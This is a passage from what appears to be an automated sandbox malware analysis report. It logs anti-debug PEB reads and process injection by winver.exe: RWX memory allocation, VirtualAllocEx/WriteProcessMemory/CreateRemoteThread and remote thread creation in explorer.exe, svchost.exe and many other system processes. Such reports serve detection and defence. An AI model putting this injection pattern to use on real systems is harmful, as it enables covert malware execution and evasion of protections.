            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Code function: 28_2_00010C3F mov eax, dword ptr fs:[00000030h] | 28_2_00010C3F
            Source: C:\Windows\System32\svchost.exe | Code function: 29_2_009F0C3F mov eax, dword ptr fs:[00000030h] | 29_2_009F0C3F
            Source: C:\Windows\System32\conhost.exe | Code function: 30_2_00880C3F mov eax, dword ptr fs:[00000030h] | 30_2_00880C3F
            Source: C:\Windows\System32\dllhost.exe | Code function: 31_2_00980C3F mov eax, dword ptr fs:[00000030h] | 31_2_00980C3F
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 33_2_00A20C3F mov eax, dword ptr fs:[00000030h] | 33_2_00A20C3F
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 34_2_00060C3F mov eax, dword ptr fs:[00000030h] | 34_2_00060C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 35_2_03070C3F mov eax, dword ptr fs:[00000030h] | 35_2_03070C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 36_2_02CE0C3F mov eax, dword ptr fs:[00000030h] | 36_2_02CE0C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 37_2_00640C3F mov eax, dword ptr fs:[00000030h] | 37_2_00640C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 38_2_006D0C3F mov eax, dword ptr fs:[00000030h] | 38_2_006D0C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 39_2_02EF0C3F mov eax, dword ptr fs:[00000030h] | 39_2_02EF0C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 40_2_01470C3F mov eax, dword ptr fs:[00000030h] | 40_2_01470C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 41_2_01160C3F mov eax, dword ptr fs:[00000030h] | 41_2_01160C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 42_2_01FF0C3F mov eax, dword ptr fs:[00000030h]42_2_01FF0C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 43_2_02630C3F mov eax, dword ptr fs:[00000030h]43_2_02630C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 44_2_00810C3F mov eax, dword ptr fs:[00000030h]44_2_00810C3F

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\explorer.exe base: 1390000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\sihost.exe base: AC0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\svchost.exe base: 910000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\ctfmon.exe base: A50000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\explorer.exe base: 3450000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\svchost.exe base: D40000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 110000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: AB0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\smartscreen.exe base: 290000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 900000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 180000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 190000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\svchost.exe base: 9F0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\conhost.exe base: 880000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 980000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: A20000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 60000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 3070000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2CE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 640000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 6D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2EF0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1470000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1160000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1FF0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2630000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 810000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2CF0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 13C0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 870000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2210000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: C30000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 25E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2AB0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2410000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 13E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2DF0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1150000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: D20000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2500000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1520000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2EB0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: FC0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 29A0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2750000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 29D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 15B0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 660000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1030000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2AF0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 3030000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 12F0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 10E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: DD0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1180000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 29B0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 24C0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 9D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 940000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: FF0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: E70000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2D90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 12A0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1020000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1050000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: FC0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 4B0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 990000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: B80000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 190000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 9D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1480000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1020000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1120000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 460000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: CA0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: DB0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: AD0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 13D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2DC0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 930000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: D80000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 28A0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 25C0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 790000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 28B0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: C70000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: E00000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 14D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 28E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2BE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: C60000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: F10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Code function: 2_2_047E0DE0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread
            Source: C:\Windows\explorer.exe Code function: 3_2_01391F8D VirtualAllocEx,WriteProcessMemory,CreateRemoteThread
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\explorer.exe EIP: 13908B3Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\sihost.exe EIP: AC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 91090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 9A090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\ctfmon.exe EIP: A5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\explorer.exe EIP: 345090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: D4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe EIP: B5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 11090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe EIP: A9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: AB090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\smartscreen.exe EIP: 29090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe EIP: 58090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 90090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\ApplicationFrameHost.exe EIP: 18090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe EIP: A1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 19090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\ImmersiveControlPanel\SystemSettings.exe EIP: F1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\oobe\UserOOBEBroker.exe EIP: 1090BJump to behavior
